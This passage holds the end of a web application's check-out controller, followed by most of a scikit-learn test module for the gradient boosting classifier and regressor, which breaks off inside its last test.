#timestmp = form_vars.get("timestmp", None)
#if timestmp:
# # @ToDo: Convert from string
# pass
#tracker.set_location(r.record.location_id, timestmp=timestmp)
tracker.set_location(r.record.location_id)
response.confirmation = T("Checked-Out successfully!")
response.view = "check-in.html"
output = dict(form = form,
title = title,
)
return output
# @ToDo: JSON representation for check-out from mobile devices
else:
raise HTTP(501, current.ERROR.BAD_METHOD)
# END =========================================================================
|
|
"""
Testing for the gradient boosting module (sklearn.ensemble.gradient_boosting).
"""
import warnings
import numpy as np
from sklearn import datasets
from sklearn.base import clone
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.ensemble.gradient_boosting import ZeroEstimator
from sklearn.metrics import mean_squared_error
from sklearn.utils import check_random_state, tosequence
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_warns
from sklearn.utils.validation import DataConversionWarning
from sklearn.utils.validation import NotFittedError
# toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
true_result = [-1, 1, 1]
rng = np.random.RandomState(0)
# also load the boston dataset
# and randomly permute it
boston = datasets.load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
# also load the iris dataset
# and randomly permute it
iris = datasets.load_iris()
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
def test_classification_toy():
# Check classification on a toy dataset.
for loss in ('deviance', 'exponential'):
clf = GradientBoostingClassifier(loss=loss, n_estimators=10,
random_state=1)
assert_raises(ValueError, clf.predict, T)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(10, len(clf.estimators_))
deviance_decrease = (clf.train_score_[:-1] - clf.train_score_[1:])
assert np.any(deviance_decrease >= 0.0), \
"Train deviance does not monotonically decrease."
def test_parameter_checks():
# Check input parameter validation.
assert_raises(ValueError,
GradientBoostingClassifier(n_estimators=0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(n_estimators=-1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(learning_rate=0.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(learning_rate=-1.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='foobar').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_split=0.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_split=-1.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_leaf=0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_samples_leaf=-1.).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_weight_fraction_leaf=-1.).fit,
X, y)
assert_raises(ValueError,
GradientBoostingClassifier(min_weight_fraction_leaf=0.6).fit,
X, y)
assert_raises(ValueError,
GradientBoostingClassifier(subsample=0.0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(subsample=1.1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(subsample=-0.1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(max_depth=-0.1).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(max_depth=0).fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(init={}).fit, X, y)
# test fit before feature importance
assert_raises(ValueError,
lambda: GradientBoostingClassifier().feature_importances_)
# deviance requires ``n_classes >= 2``.
assert_raises(ValueError,
lambda X, y: GradientBoostingClassifier(
loss='deviance').fit(X, y),
X, [0, 0, 0, 0])
def test_loss_function():
assert_raises(ValueError,
GradientBoostingClassifier(loss='ls').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='lad').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='quantile').fit, X, y)
assert_raises(ValueError,
GradientBoostingClassifier(loss='huber').fit, X, y)
assert_raises(ValueError,
GradientBoostingRegressor(loss='deviance').fit, X, y)
assert_raises(ValueError,
GradientBoostingRegressor(loss='exponential').fit, X, y)
def test_classification_synthetic():
# Test GradientBoostingClassifier on synthetic dataset used by
# Hastie et al. in ESLII Example 12.7.
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
for loss in ('deviance', 'exponential'):
gbrt = GradientBoostingClassifier(n_estimators=100, min_samples_split=1,
max_depth=1, loss=loss,
learning_rate=1.0, random_state=0)
gbrt.fit(X_train, y_train)
error_rate = (1.0 - gbrt.score(X_test, y_test))
assert error_rate < 0.09, \
"GB(loss={}) failed with error {}".format(loss, error_rate)
gbrt = GradientBoostingClassifier(n_estimators=200, min_samples_split=1,
max_depth=1,
learning_rate=1.0, subsample=0.5,
random_state=0)
gbrt.fit(X_train, y_train)
error_rate = (1.0 - gbrt.score(X_test, y_test))
assert error_rate < 0.08, ("Stochastic GradientBoostingClassifier(loss={}) "
"failed with error {}".format(loss, error_rate))
def test_boston():
# Check consistency on dataset boston house prices with least squares
# and least absolute deviation.
for loss in ("ls", "lad", "huber"):
for subsample in (1.0, 0.5):
last_y_pred = None
for i, sample_weight in enumerate(
(None, np.ones(len(boston.target)),
2 * np.ones(len(boston.target)))):
clf = GradientBoostingRegressor(n_estimators=100, loss=loss,
max_depth=4, subsample=subsample,
min_samples_split=1,
random_state=1)
assert_raises(ValueError, clf.predict, boston.data)
clf.fit(boston.data, boston.target,
sample_weight=sample_weight)
y_pred = clf.predict(boston.data)
mse = mean_squared_error(boston.target, y_pred)
assert mse < 6.0, "Failed with loss %s and " \
"mse = %.4f" % (loss, mse)
if last_y_pred is not None:
np.testing.assert_array_almost_equal(
last_y_pred, y_pred,
err_msg='pred_%d doesnt match last pred_%d for loss %r and subsample %r. '
% (i, i - 1, loss, subsample))
last_y_pred = y_pred
def test_iris():
# Check consistency on dataset iris.
for subsample in (1.0, 0.5):
for sample_weight in (None, np.ones(len(iris.target))):
clf = GradientBoostingClassifier(n_estimators=100, loss='deviance',
random_state=1, subsample=subsample)
clf.fit(iris.data, iris.target, sample_weight=sample_weight)
score = clf.score(iris.data, iris.target)
assert score > 0.9, "Failed with subsample %.1f " \
"and score = %f" % (subsample, score)
def test_regression_synthetic():
# Test on synthetic regression datasets used in Leo Breiman,
# "Bagging Predictors". Machine Learning 24(2): 123-140 (1996).
random_state = check_random_state(1)
regression_params = {'n_estimators': 100, 'max_depth': 4,
'min_samples_split': 1, 'learning_rate': 0.1,
'loss': 'ls'}
# Friedman1
X, y = datasets.make_friedman1(n_samples=1200,
random_state=random_state, noise=1.0)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingRegressor()
clf.fit(X_train, y_train)
mse = mean_squared_error(y_test, clf.predict(X_test))
assert mse < 5.0, "Failed on Friedman1 with mse = %.4f" % mse
# Friedman2
X, y = datasets.make_friedman2(n_samples=1200, random_state=random_state)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingRegressor(**regression_params)
clf.fit(X_train, y_train)
mse = mean_squared_error(y_test, clf.predict(X_test))
assert mse < 1700.0, "Failed on Friedman2 with mse = %.4f" % mse
# Friedman3
X, y = datasets.make_friedman3(n_samples=1200, random_state=random_state)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingRegressor(**regression_params)
clf.fit(X_train, y_train)
mse = mean_squared_error(y_test, clf.predict(X_test))
assert mse < 0.015, "Failed on Friedman3 with mse = %.4f" % mse
def test_feature_importances():
X = np.array(boston.data, dtype=np.float32)
y = np.array(boston.target, dtype=np.float32)
clf = GradientBoostingRegressor(n_estimators=100, max_depth=5,
min_samples_split=1, random_state=1)
clf.fit(X, y)
#feature_importances = clf.feature_importances_
assert_true(hasattr(clf, 'feature_importances_'))
X_new = clf.transform(X, threshold="mean")
assert_less(X_new.shape[1], X.shape[1])
feature_mask = clf.feature_importances_ > clf.feature_importances_.mean()
assert_array_almost_equal(X_new, X[:, feature_mask])
# true feature importance ranking
# true_ranking = np.array([3, 1, 8, 2, 10, 9, 4, 11, 0, 6, 7, 5, 12])
# assert_array_equal(true_ranking, feature_importances.argsort())
def test_probability_log():
# Predict probabilities.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(ValueError, clf.predict_proba, T)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
# check if probabilities are in [0, 1].
y_proba = clf.predict_proba(T)
assert np.all(y_proba >= 0.0)
assert np.all(y_proba <= 1.0)
# derive predictions from probabilities
y_pred = clf.classes_.take(y_proba.argmax(axis=1), axis=0)
assert_array_equal(y_pred, true_result)
def test_check_inputs():
# Test input checks (shape and type of X and y).
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(ValueError, clf.fit, X, y + [0, 1])
from scipy import sparse
X_sparse = sparse.csr_matrix(X)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(TypeError, clf.fit, X_sparse, y)
clf = GradientBoostingClassifier().fit(X, y)
assert_raises(TypeError, clf.predict, X_sparse)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
assert_raises(ValueError, clf.fit, X, y,
sample_weight=([1] * len(y)) + [0, 1])
def test_check_inputs_predict():
# X has wrong shape
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y)
x = np.array([1.0, 2.0])[:, np.newaxis]
assert_raises(ValueError, clf.predict, x)
x = np.array([])
assert_raises(ValueError, clf.predict, x)
x = np.array([1.0, 2.0, 3.0])[:, np.newaxis]
assert_raises(ValueError, clf.predict, x)
clf = GradientBoostingRegressor(n_estimators=100, random_state=1)
clf.fit(X, rng.rand(len(X)))
x = np.array([1.0, 2.0])[:, np.newaxis]
assert_raises(ValueError, clf.predict, x)
x = np.array([])
assert_raises(ValueError, clf.predict, x)
x = np.array([1.0, 2.0, 3.0])[:, np.newaxis]
assert_raises(ValueError, clf.predict, x)
def test_check_max_features():
# test if max_features is valid.
clf = GradientBoostingRegressor(n_estimators=100, random_state=1,
max_features=0)
assert_raises(ValueError, clf.fit, X, y)
clf = GradientBoostingRegressor(n_estimators=100, random_state=1,
max_features=(len(X[0]) + 1))
assert_raises(ValueError, clf.fit, X, y)
clf = GradientBoostingRegressor(n_estimators=100, random_state=1,
max_features=-0.1)
assert_raises(ValueError, clf.fit, X, y)
def test_max_feature_regression():
# Test to make sure random state is set properly.
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
gbrt = GradientBoostingClassifier(n_estimators=100, min_samples_split=5,
max_depth=2, learning_rate=.1,
max_features=2, random_state=1)
gbrt.fit(X_train, y_train)
deviance = gbrt.loss_(y_test, gbrt.decision_function(X_test))
assert_true(deviance < 0.5, "GB failed with deviance %.4f" % deviance)
def test_max_feature_auto():
# Test if max features is set properly for floats and str.
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
_, n_features = X.shape
X_train = X[:2000]
y_train = y[:2000]
gbrt = GradientBoostingClassifier(n_estimators=1, max_features='auto')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(np.sqrt(n_features)))
gbrt = GradientBoostingRegressor(n_estimators=1, max_features='auto')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, n_features)
gbrt = GradientBoostingRegressor(n_estimators=1, max_features=0.3)
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(n_features * 0.3))
gbrt = GradientBoostingRegressor(n_estimators=1, max_features='sqrt')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(np.sqrt(n_features)))
gbrt = GradientBoostingRegressor(n_estimators=1, max_features='log2')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(np.log2(n_features)))
gbrt = GradientBoostingRegressor(n_estimators=1,
max_features=0.01 / X.shape[1])
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, 1)
def test_staged_predict():
# Test whether staged decision function eventually gives
# the same prediction.
X, y = datasets.make_friedman1(n_samples=1200,
random_state=1, noise=1.0)
X_train, y_train = X[:200], y[:200]
X_test = X[200:]
clf = GradientBoostingRegressor()
# test raise ValueError if not fitted
assert_raises(ValueError, lambda X: np.fromiter(
clf.staged_predict(X), dtype=np.float64), X_test)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
# test if prediction for last stage equals ``predict``
for y in clf.staged_predict(X_test):
assert_equal(y.shape, y_pred.shape)
assert_array_equal(y_pred, y)
def test_staged_predict_proba():
# Test whether staged predict proba eventually gives
# the same prediction.
X, y = datasets.make_hastie_10_2(n_samples=1200,
random_state=1)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingClassifier(n_estimators=20)
# test raise NotFittedError if not fitted
assert_raises(NotFittedError, lambda X: np.fromiter(
clf.staged_predict_proba(X), dtype=np.float64), X_test)
clf.fit(X_train, y_train)
# test if prediction for last stage equals ``predict``
for y_pred in clf.staged_predict(X_test):
assert_equal(y_test.shape, y_pred.shape)
assert_array_equal(clf.predict(X_test), y_pred)
# test if prediction for last stage equals ``predict_proba``
for staged_proba in clf.staged_predict_proba(X_test):
assert_equal(y_test.shape[0], staged_proba.shape[0])
assert_equal(2, staged_proba.shape[1])
assert_array_equal(clf.predict_proba(X_test), staged_proba)
def test_staged_functions_defensive():
# test that staged_functions make defensive copies
rng = np.random.RandomState(0)
X = rng.uniform(size=(10, 3))
y = (4 * X[:, 0]).astype(np.int) + 1 # don't predict zeros
for estimator in [GradientBoostingRegressor(),
GradientBoostingClassifier()]:
estimator.fit(X, y)
for func in ['predict', 'decision_function', 'predict_proba']:
staged_func = getattr(estimator, "staged_" + func, None)
if staged_func is None:
# regressor has no staged_predict_proba
continue
with warnings.catch_warnings(record=True):
staged_result = list(staged_func(X))
staged_result[1][:] = 0
assert_true(np.all(staged_result[0] != 0))
def test_serialization():
# Check model serialization.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
try:
import cPickle as pickle
except ImportError:
import pickle
serialized_clf = pickle.dumps(clf, protocol=pickle.HIGHEST_PROTOCOL)
clf = None
clf = pickle.loads(serialized_clf)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
def test_degenerate_targets():
# Check if we can fit even though all targets are equal.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
# classifier should raise exception
assert_raises(ValueError, clf.fit, X, np.ones(len(X)))
clf = GradientBoostingRegressor(n_estimators=100, random_state=1)
clf.fit(X, np.ones(len(X)))
clf.predict(rng.rand(2))
assert_array_equal(np.ones((1,), dtype=np.float64),
clf.predict(rng.rand(2)))
def test_quantile_loss():
# Check if quantile loss with alpha=0.5 equals lad.
clf_quantile = GradientBoostingRegressor(n_estimators=100, loss='quantile',
max_depth=4, alpha=0.5,
random_state=7)
clf_quantile.fit(boston.data, boston.target)
y_quantile = clf_quantile.predict(boston.data)
clf_lad = GradientBoostingRegressor(n_estimators=100, loss='lad',
max_depth=4, random_state=7)
clf_lad.fit(boston.data, boston.target)
y_lad = clf_lad.predict(boston.data)
assert_array_almost_equal(y_quantile, y_lad, decimal=4)
def test_symbol_labels():
# Test with non-integer class labels.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
symbol_y = tosequence(map(str, y))
clf.fit(X, symbol_y)
assert_array_equal(clf.predict(T), tosequence(map(str, true_result)))
assert_equal(100, len(clf.estimators_))
def test_float_class_labels():
# Test with float class labels.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
float_y = np.asarray(y, dtype=np.float32)
clf.fit(X, float_y)
assert_array_equal(clf.predict(T),
np.asarray(true_result, dtype=np.float32))
assert_equal(100, len(clf.estimators_))
def test_shape_y():
    # Test with y given as a 2d column vector instead of a 1d array.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
y_ = np.asarray(y, dtype=np.int32)
y_ = y_[:, np.newaxis]
# This will raise a DataConversionWarning that we want to
# "always" raise, elsewhere the warnings gets ignored in the
# later tests, and the tests that check for this warning fail
assert_warns(DataConversionWarning, clf.fit, X, y_)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
def test_mem_layout():
# Test with different memory layouts of X and y
X_ = np.asfortranarray(X)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X_, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
X_ = np.ascontiguousarray(X)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X_, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
y_ = np.asarray(y, dtype=np.int32)
y_ = np.ascontiguousarray(y_)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y_)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
y_ = np.asarray(y, dtype=np.int32)
y_ = np.asfortranarray(y_)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y_)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
def test_oob_improvement():
# Test if oob improvement has correct shape and regression test.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
subsample=0.5)
clf.fit(X, y)
assert clf.oob_improvement_.shape[0] == 100
# hard-coded regression test - change if modification in OOB computation
assert_array_almost_equal(clf.oob_improvement_[:5],
np.array([0.19, 0.15, 0.12, -0.12, -0.11]),
decimal=2)
def test_oob_improvement_raise():
# Test if oob improvement has correct shape.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
subsample=1.0)
clf.fit(X, y)
assert_raises(AttributeError, lambda: clf.oob_improvement_)
def test_oob_multiclass_iris():
# Check OOB improvement on multi-class dataset.
clf = GradientBoostingClassifier(n_estimators=100, loss='deviance',
random_state=1, subsample=0.5)
clf.fit(iris.data, iris.target)
score = clf.score(iris.data, iris.target)
assert score > 0.9, "Failed with subsample %.1f " \
"and score = %f" % (0.5, score)
assert clf.oob_improvement_.shape[0] == clf.n_estimators
# hard-coded regression test - change if modification in OOB computation
# FIXME: the following snippet does not yield the same results on 32 bits
# assert_array_almost_equal(clf.oob_improvement_[:5],
# np.array([12.68, 10.45, 8.18, 6.43, 5.13]),
# decimal=2)
def test_verbose_output():
# Check verbose=1 does not cause error.
from sklearn.externals.six.moves import cStringIO as StringIO
import sys
old_stdout = sys.stdout
sys.stdout = StringIO()
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
verbose=1, subsample=0.8)
clf.fit(X, y)
verbose_output = sys.stdout
sys.stdout = old_stdout
# check output
verbose_output.seek(0)
header = verbose_output.readline().rstrip()
# with OOB
true_header = ' '.join(['%10s'] + ['%16s'] * 3) % (
'Iter', 'Train Loss', 'OOB Improve', 'Remaining Time')
assert_equal(true_header, header)
n_lines = sum(1 for l in verbose_output.readlines())
# one for 1-10 and then 9 for 20-100
assert_equal(10 + 9, n_lines)
def test_more_verbose_output():
# Check verbose=2 does not cause error.
from sklearn.externals.six.moves import cStringIO as StringIO
import sys
old_stdout = sys.stdout
sys.stdout = StringIO()
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
verbose=2)
clf.fit(X, y)
verbose_output = sys.stdout
sys.stdout = old_stdout
# check output
verbose_output.seek(0)
header = verbose_output.readline().rstrip()
# no OOB
true_header = ' '.join(['%10s'] + ['%16s'] * 2) % (
'Iter', 'Train Loss', 'Remaining Time')
assert_equal(true_header, header)
n_lines = sum(1 for l in verbose_output.readlines())
# 100 lines for n_estimators==100
assert_equal(100, n_lines)
def test_warm_start():
# Test if warm start equals fit.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=200, max_depth=1)
est.fit(X, y)
est_ws = Cls(n_estimators=100, max_depth=1, warm_start=True)
est_ws.fit(X, y)
est_ws.set_params(n_estimators=200)
est_ws.fit(X, y)
assert_array_almost_equal(est_ws.predict(X), est.predict(X))
def test_warm_start_n_estimators():
# Test if warm start equals fit - set n_estimators.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=300, max_depth=1)
est.fit(X, y)
est_ws = Cls(n_estimators=100, max_depth=1, warm_start=True)
est_ws.fit(X, y)
est_ws.set_params(n_estimators=300)
est_ws.fit(X, y)
assert_array_almost_equal(est_ws.predict(X), est.predict(X))
def test_warm_start_max_depth():
# Test if possible to fit trees of different depth in ensemble.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=110, max_depth=2)
est.fit(X, y)
# last 10 trees have different depth
assert est.estimators_[0, 0].max_depth == 1
for i in range(1, 11):
assert est.estimators_[-i, 0].max_depth == 2
def test_warm_start_clear():
# Test if fit clears state.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1)
est.fit(X, y)
est_2 = Cls(n_estimators=100, max_depth=1, warm_start=True)
est_2.fit(X, y) # inits state
est_2.set_params(warm_start=False)
est_2.fit(X, y) # clears old state and equals est
assert_array_almost_equal(est_2.predict(X), est.predict(X))
def test_warm_start_zero_n_estimators():
# Test if warm start with zero n_estimators raises error
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=0)
assert_raises(ValueError, est.fit, X, y)
def test_warm_start_smaller_n_estimators():
# Test if warm start with smaller n_estimators raises error
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=99)
assert_raises(ValueError, est.fit, X, y)
def test_warm_start_equal_n_estimators():
# Test if warm start with equal n_estimators does nothing
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1)
est.fit(X, y)
est2 = clone(est)
est2.set_params(n_estimators=est.n_estimators, warm_start=True)
est2.fit(X, y)
assert_array_almost_equal(est2.predict(X), est.predict(X))
def test_warm_start_oob_switch():
# Test if oob can be turned on during warm start.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=110, subsample=0.5)
est.fit(X, y)
assert_array_equal(est.oob_improvement_[:100], np.zeros(100))
# the last 10 are not zeros
assert_array_equal(est.oob_improvement_[-10:] == 0.0,
np.zeros(10, dtype=np.bool))
def test_warm_start_oob():
# Test if warm start OOB equals fit.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=200, max_depth=1, subsample=0.5,
random_state=1)
est.fit(X, y)
est_ws = Cls(n_estimators=100, max_depth=1, subsample=0.5,
random_state=1, warm_start=True)
est_ws.fit(X, y)
est_ws.set_params(n_estimators=200)
est_ws.fit(X, y)
assert_array_almost_equal(est_ws.oob_improvement_[:100],
est.oob_improvement_[:100])
def early_stopping_monitor(i, est, locals):
"""Returns True on the 10th iteration. """
if i == 9:
return True
else:
return False
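# Editorial note (illustrative, not part of the original test module): the
# ``monitor`` callback passed to ``fit`` is called once per boosting iteration
# as ``monitor(i, est, locals)``, where ``i`` is the zero-based iteration
# index, ``est`` is the estimator being fitted and ``locals`` is the dict of
# local variables inside ``fit``. Returning a truthy value stops training
# early, which is why the monitor above caps the ensembles below at exactly
# 10 estimators.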
def test_monitor_early_stopping():
# Test if monitor return value works.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=20, max_depth=1, random_state=1, subsample=0.5)
est.fit(X, y, monitor=early_stopping_monitor)
assert_equal(est.n_estimators, 20) # this is not altered
assert_equal(est.estimators_.shape[0], 10)
assert_equal(est.train_score_.shape[0], 10)
assert_equal(est.oob_improvement_.shape[0], 10)
# try refit
est.set_params(n_estimators=30)
est.fit(X, y)
assert_equal(est.n_estimators, 30)
assert_equal(est.estimators_.shape[0], 30)
assert_equal(est.train_score_.shape[0], 30)
est = Cls(n_estimators=20, max_depth=1, random_state=1, subsample=0.5,
warm_start=True)
est.fit(X, y, monitor=early_stopping_monitor)
assert_equal(est.n_estimators, 20)
assert_equal(est.estimators_.shape[0], 10)
assert_equal(est.train_score_.shape[0], 10)
assert_equal(est.oob_improvement_.shape[0], 10)
# try refit
est.set_params(n_estimators=30, warm_start=False)
est.fit(X, y)
assert_equal(est.n_estimators, 30)
assert_equal(est.train_score_.shape[0], 30)
assert_equal(est.estimators_.shape[0], 30)
assert_equal(est.oob_improvement_.shape[0], 30)
def test_complete_classification():
    # Test greedy trees with max_depth + 1 leaves.
from sklearn.tree._tree import TREE_LEAF
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
k = 4
est = GradientBoostingClassifier(n_estimators=20, max_depth=None,
random_state=1, max_leaf_nodes=k + 1)
est.fit(X, y)
tree = est.estimators_[0, 0].tree_
assert_equal(tree.max_depth, k)
assert_equal(tree.children_left[tree.children_left == TREE_LEAF].shape[0],
k + 1)
def test_complete_regression():
    # Test greedy trees with max_depth + 1 leaves.
from sklearn.tree._tree import TREE_LEAF
k = 4
est = GradientBoostingRegressor(n_estimators=20, max_depth=None,
random_state=1, max_leaf_nodes=k + 1)
est.fit(boston.data, boston.target)
tree = est.estimators_[-1, 0].tree_
assert_equal(tree.children_left[tree.children_left == TREE_LEAF].shape[0],
k + 1)
def test_zero_estimator_reg():
# Test if ZeroEstimator works for regression.
est = GradientBoostingRegressor(n_estimators=20, max_depth=1,
random_state=1, init=ZeroEstimator())
est.fit(boston.data, boston.target)
y_pred = est.predict(boston.data)
mse = mean_squared_error(boston.target, y_pred)
assert_almost_equal(mse, 33.0, decimal=0)
est = GradientBoostingRegressor(n_estimators=20, max_depth=1,
random_state=1, init='zero')
est.fit(boston.data, boston.target)
y_pred = est.predict(boston.data)
mse = mean_squared_error(boston.target, y_pred)
assert_almost_equal(mse, 33.0, decimal=0)
est = GradientBoostingRegressor(n_estimators=20, max_depth=1,
random_state=1, init='foobar')
assert_raises(ValueError, est.fit, boston.data, boston.target)
def test_zero_estimator_clf():
# Test if ZeroEstimator works for classification.
X = iris.data
y = np.array(iris.target)
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init=ZeroEstimator())
est.fit(X, y)
assert est.score(X, y) > 0.96
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init='zero')
est.fit(X, y)
assert est.score(X, y) > 0.96
# binary clf
mask = y != 0
y[mask] = 1
y[~mask] = 0
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init='zero')
est.fit(X, y)
assert est.score(X, y) > 0.96
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init='foobar')
assert_raises(ValueError, est.fit, X, y)
def test_max_leaf_nodes_max_depth():
    # Test precedence of max_leaf_nodes over max_depth.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
all_estimators = [GradientBoostingRegressor,
GradientBoostingClassifier]
k = 4
for GBEstimator in all_estimators:
est = GBEstimator(max_depth=1, max_leaf_nodes=k).fit(X, y)
tree = est.estimators_[0, 0].tree_
assert_greater(tree.max_depth, 1)
est = GBEstimator(max_depth=1).fit(X, y)
tree = est.estimators_[0, 0].tree_
assert_equal(tree.max_depth, 1)
def test_warm_start_wo_nestimators_change():
# Test if warm_start does nothing if n_estimators is not changed.
# Regression test for #3513.
clf = GradientBoostingClassifier(n_estimators=10, warm_start=True)
clf.fit([[0, 1], [2, 3]], [0, 1])
assert clf.estimators_.shape[0] == 10
clf.fit([[0, 1], [2, 3]], [0, 1])
assert clf.estimators_.shape[0] == 10
def test_probability_exponential():
# Predict probabilities.
clf = GradientBoostingClassifier(loss='exponential',
n_estimators=100, random_state=1)
assert_raises(ValueError, clf.predict_proba, T)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
# check if probabilities are in [0, 1].
y_proba = clf.predict_proba(T)
assert np.all(y_proba >= 0.0)
assert np.all(y_proba <= 1.0)
score = clf.decision_function(T).ravel()
assert_array_almost_equal(y_proba[:, 1],
1.0 / (1.0 + np.exp(-2 * score)))
# derive predictions from probabilities
y_pred = clf.classes_.take(y_proba.argmax(axis=1), axis=0)
assert_array_equal(y_pred, true_result)
def test_non_uniform_weights_toy_edge_case_reg():
X = [[1, 0],
[1, 0],
[1, 0],
[0, 1]]
y = [0, 0, 1, 0]
# ignore the first 2 training samples by setting their weight to 0
sample_weight = [0, 0, 1, 1]
